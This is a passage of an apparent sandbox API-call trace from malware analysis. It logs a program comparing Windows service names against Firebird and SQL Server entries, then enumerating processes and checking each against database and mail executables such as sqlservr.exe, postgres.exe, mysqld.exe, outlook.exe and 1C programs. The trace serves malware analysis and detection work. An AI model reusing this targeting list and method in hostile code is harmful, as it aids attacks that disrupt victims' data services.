lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0260.194] lstrlenW (lpString="BFE") returned 3 [0260.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0260.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0260.194] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0260.194] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0260.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0260.194] lstrlenW (lpString="CscService") returned 10 [0260.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0260.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0260.194] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0260.194] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0260.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0260.194] lstrlenW (lpString="DcomLaunch") returned 10 [0260.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0260.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0260.195] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0260.195] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0260.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0260.195] lstrlenW (lpString="Dhcp") returned 4 [0260.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0260.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0260.195] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0260.195] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0260.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0260.195] lstrlenW (lpString="Dnscache") returned 8 [0260.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0260.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0260.195] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0260.195] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0260.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0260.195] lstrlenW (lpString="eventlog") returned 8 [0260.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0260.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0260.195] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0260.195] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0260.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0260.195] lstrlenW (lpString="EventSystem") returned 11 [0260.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0260.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0260.195] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0260.195] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0260.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0260.195] lstrlenW (lpString="gpsvc") returned 5 [0260.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0260.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0260.195] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0260.195] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0260.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0260.195] lstrlenW (lpString="lmhosts") returned 7 [0260.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0260.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0260.196] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0260.196] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0260.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0260.196] lstrlenW (lpString="MMCSS") returned 5 [0260.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0260.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0260.196] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0260.196] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0260.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0260.196] lstrlenW (lpString="nsi") returned 3 [0260.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0260.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0260.196] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0260.196] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0260.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0260.196] lstrlenW (lpString="PlugPlay") returned 8 [0260.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0260.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0260.196] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0260.196] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0260.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0260.196] lstrlenW (lpString="Power") returned 5 [0260.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0260.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0260.196] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0260.196] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0260.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0260.196] lstrlenW (lpString="ProfSvc") returned 7 [0260.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0260.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0260.196] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0260.196] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0260.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0260.197] lstrlenW (lpString="RpcEptMapper") returned 12 [0260.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0260.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0260.197] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0260.197] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0260.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0260.197] lstrlenW (lpString="RpcSs") returned 5 [0260.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0260.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0260.197] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0260.197] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0260.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0260.197] lstrlenW (lpString="SamSs") returned 5 [0260.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0260.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0260.197] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0260.197] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0260.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0260.197] lstrlenW (lpString="Schedule") returned 8 [0260.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0260.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0260.197] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0260.197] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0260.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0260.197] lstrlenW (lpString="SENS") returned 4 [0260.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0260.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0260.197] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0260.197] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0260.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0260.197] lstrlenW (lpString="ShellHWDetection") returned 16 [0260.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0260.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0260.198] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0260.198] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0260.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0260.198] lstrlenW (lpString="Spooler") returned 7 [0260.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0260.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0260.198] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0260.198] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0260.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0260.198] lstrlenW (lpString="Themes") returned 6 [0260.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0260.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0260.198] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0260.198] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0260.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0260.198] lstrlenW (lpString="UxSms") returned 5 [0260.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0260.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0260.198] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0260.198] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0260.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0260.198] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55d450 | out: hHeap=0x520000) returned 1 [0260.204] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0260.207] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.207] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0260.207] lstrlenW (lpString="System") returned 6 [0260.207] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0260.207] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0260.207] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0260.207] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0260.207] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0260.207] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0260.207] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0260.207] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0260.208] lstrlenW (lpString="smss.exe") returned 8 [0260.208] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0260.208] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0260.208] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0260.208] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0260.208] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0260.208] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0260.208] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0260.208] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.208] lstrlenW (lpString="csrss.exe") returned 9 [0260.208] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0260.208] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0260.208] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0260.208] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0260.208] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0260.208] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0260.208] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0260.208] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0260.208] lstrlenW (lpString="wininit.exe") returned 11 [0260.208] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0260.209] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0260.209] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0260.209] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0260.209] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0260.209] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0260.209] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0260.209] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.209] lstrlenW (lpString="csrss.exe") returned 9 [0260.209] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0260.209] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0260.209] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0260.209] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0260.209] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0260.209] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0260.209] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0260.209] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0260.209] lstrlenW (lpString="winlogon.exe") returned 12 [0260.209] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0260.209] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0260.209] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0260.209] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0260.210] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0260.210] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0260.210] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0260.210] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0260.210] lstrlenW (lpString="services.exe") returned 12 [0260.210] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0260.210] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0260.210] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0260.210] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0260.210] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0260.210] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0260.210] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0260.210] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0260.210] lstrlenW (lpString="lsass.exe") returned 9 [0260.210] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0260.210] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0260.210] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0260.210] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0260.210] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0260.210] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0260.211] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0260.211] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0260.211] lstrlenW (lpString="lsm.exe") returned 7 [0260.211] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0260.211] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0260.211] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0260.211] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0260.211] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0260.211] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0260.211] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0260.211] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.211] lstrlenW (lpString="svchost.exe") returned 11 [0260.211] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0260.211] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0260.211] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0260.211] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0260.211] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0260.211] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0260.211] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0260.211] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.212] lstrlenW (lpString="svchost.exe") returned 11 [0260.212] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0260.212] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0260.212] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0260.212] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0260.212] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0260.212] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0260.212] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0260.212] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.212] lstrlenW (lpString="svchost.exe") returned 11 [0260.212] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0260.212] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0260.212] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0260.212] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0260.212] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0260.212] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0260.212] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0260.212] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1ac, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0260.213] lstrlenW (lpString="LogonUI.exe") returned 11 [0260.213] lstrcmpiW (lpString1="1c8.exe", lpString2="LogonUI.exe") returned -1 [0260.213] lstrcmpiW (lpString1="1cv77.exe", lpString2="LogonUI.exe") returned -1 [0260.213] lstrcmpiW (lpString1="outlook.exe", lpString2="LogonUI.exe") returned 1 [0260.213] lstrcmpiW (lpString1="postgres.exe", lpString2="LogonUI.exe") returned 1 [0260.213] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="LogonUI.exe") returned 1 [0260.213] lstrcmpiW (lpString1="mysqld.exe", lpString2="LogonUI.exe") returned 1 [0260.213] lstrcmpiW (lpString1="sqlservr.exe", lpString2="LogonUI.exe") returned 1 [0260.213] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.213] lstrlenW (lpString="svchost.exe") returned 11 [0260.213] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0260.213] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0260.213] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0260.213] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0260.213] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0260.213] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0260.213] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0260.213] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.213] lstrlenW (lpString="svchost.exe") returned 11 [0260.214] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0260.214] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0260.214] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0260.214] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0260.214] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0260.214] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0260.214] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0260.214] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0260.558] lstrlenW (lpString="audiodg.exe") returned 11 [0260.558] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0260.558] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0260.558] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0260.558] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0260.559] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0260.559] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0260.559] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0260.559] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.559] lstrlenW (lpString="svchost.exe") returned 11 [0260.559] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0260.559] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 